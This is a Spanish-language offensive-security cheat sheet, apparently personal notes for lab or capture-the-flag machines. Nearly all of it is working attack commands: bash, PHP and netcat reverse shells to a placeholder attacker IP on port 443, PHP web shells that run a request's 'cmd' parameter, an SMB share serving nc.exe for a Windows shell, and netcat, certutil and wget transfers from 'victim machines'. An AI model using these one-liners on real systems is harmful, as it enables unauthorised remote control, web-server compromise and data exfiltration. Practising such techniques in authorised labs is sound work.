Comandos.
Reverse Shell.
Estas son algunas formas con las cuales puedes enviarte una reverse shell a tu equipo.
bash -c bash -i >& /dev/tcp/<ip-address>/443 0>&1
bash+-c+bash+-i+>%26+/dev/tcp/<ip-address>/443+0>%261
<?php system("bash -c 'bash -i >& /dev/tcp/<ip-address>/443 0>&1'") ?>
nc -e /bin/bash <ip-address> 443
Web shell.
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>
smbserver.py smbFolder $(pwd) -smb2support
sudo nc -nlvp 443
\\<ip-address>\smbFolder\nc.exe -e cmd <ip-address> 443
Acceder al template 404.php.
curl -s -X GET "http://<ip-address>/?p=404.php"
Reducir el peso de un archivo.
Con el comando du -hc puedes ver el peso que tiene un archivo. y con upx reduces el peso para que cuando lo quieras transferir de un equipo a otro sea más rapido.
du -hc <archivo>
upx <archivo>
Tranferir archivos o binarios.
Tranferir un archivo o binario con netcat.
nc -nlvp 443 > <file> # Desde tu equipo.
# <file> Es el nombre con el cual se va a guardar en tu equipo.
nc <ip-addres> 443 < <file> # Desde la máquina víctima.
# <file> Es el nombre del archivo que vas a transferir.
Transferir un archivo a una máquina Windows haciendo uso de smbserver.
impacket-smbserver smbFolder $(pwd) -smb2support # Desde tu equipo.
copy <archivo> \\<ip-address>\smbFolder\<archivo> # Desde la máquina víctima.
Transferir un archivo usando python para montar un servicio http por el puerto 80 y con el binario certutil.exe realizar la transferencia.
python3 -m http.server 80 # Desde tu equipo.
certutil.exe -f -urlcache -split http://<ip-address>/<archivo_a_tranferir> <nombre_como_se_guardara> # Desde la máquina víctima
Transferir un archivo con python y wget.
python3 -m http.server 80 # Desde tu equipo.
wget http://<ip-address>/<archivo> # Desde la máquina víctima.
md5sum
Comando que te ayuda a verificar que la integridad de un archivo no se haya modificado.
md5sum <file_name>